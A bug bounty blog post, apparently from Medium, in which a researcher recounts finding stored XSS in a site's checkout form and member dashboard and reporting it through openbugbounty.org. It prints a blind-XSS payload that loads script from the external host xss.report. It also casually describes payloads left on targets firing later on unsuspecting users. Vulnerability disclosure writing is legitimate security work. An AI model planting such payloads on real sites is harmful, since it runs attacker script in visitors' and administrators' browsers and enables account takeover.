← Back to list

They Fixed the Most Critical Vulnerability but Rejected the Report — Look What I Found!

First thing first, I want to thanks to Allah for giving me this opportunity again to write a new story of my journey on become a better…

El Professor Qais · 2025-05-30 09:37 · 11 claps · 2.6 min read paywalled
#stored-xss #openbugbounty #cybersecurity #hacking-for-defense #defacement
Open on Medium ↗
Wiki topics: 🔒 · Cybersecurity 🎮 · Gaming

They Fixed the Most Critical Vulnerability but Rejected the Report — Look What I Found!

Stored XSS leads to Privilege Escalation

Stored XSS leads to Privilege Escalation

First thing first, I want to thanks to Allah for giving me this opportunity again to write a new story of my journey on become a better person in this Bug Bounty field. Lets get started to our main point.

This vulnerability was discovered like the report shown from xss.report below. This vulnerability was reported directly to openbugbounty.org after their detection.

Well, some people here might already catch up to this point where you can guess right where the form that stored the script. :)

Yes, that’s so true! Their checkout page!

On my first sight seeing their checkout form, I think XSS would work easily after seeing their interface. You might already heard and know about the instinct of a Bug Hunter and also RCE Hunter. I got this type of instinct maybe 6 years ago. Who are new here, no worries, you will feel it too! Just keep dedicated yourself and explore more! I can’t explain that feel because you have to feel yourself that kind of thing.

Image show how does my script executed!

Image show how does my script executed!

Anyway, the first thing I tried before got that admin page report, I found out about their first Stored XSS on their member page after logged in. Since they put a limit character on the XSS execution page which is their dashboard page, I can still bypass it since my payload was so simple and most importantly it is a dumb one. 🥴

<script src=”https://xss.report/c/[YOUR_USERNAME_HERE]"><</h1>

Dumb one right? Yet it is the most powerful when executed! Don’t judge a book by its cover. I didn’t meant anything negative when I said it was a dumb one. It’s just a simple payload which is provided by the xss.report.

Below shown the report about xss execution report on the members dashboard page.

From this point, I could feel money coming in with ease since they stated in the program that they would pay even they only open the program on openbugbounty.org which is not too popular among Bug Bounty Hunter.

What’s the best of XSS.REPORT ?

For me, this is also important part. You know, when sometimes you miss the target but you use xss.report payload and later you forgot about it and suddenly a few notification popup on your phone screen showing someone got hit by your payload that you miss. You will know the feeling of happiness got money with a critical hit!😆

Conclusion

As we all know that Stored XSS also known as Persistent XSS. This type of XSS will heavily damage your web apps if an administrator got any hit by the attacker’s stored xss. The table will turn! Attackers got admin privilege. Game Over! Lastly, FYI I didn’t mind at all even though I got the most critical hit on any web apps. I did this because it’s my passion and also out of my curiosity to find something new that needs to be discovered and mastered.

KeepItUp #DontGiveUP #BugBountyHunters


메타데이터
post_id
6eb8073e8d8b
slug
they-fixed-the-most-critical-vulnerability-but-rejected-the-report-look-what-i-found-6eb8073e8d8b
url
https://medium.com/@wanqais007/they-fixed-the-most-critical-vulnerability-but-rejected-the-report-look-what-i-found-6eb8073e8d8b
canonical_url
https://medium.com/@wanqais007/they-fixed-the-most-critical-vulnerability-but-rejected-the-report-look-what-i-found-6eb8073e8d8b
author_url
https://medium.com/@wanqais007
status
ok
fetched_at
2026-06-11 11:25:07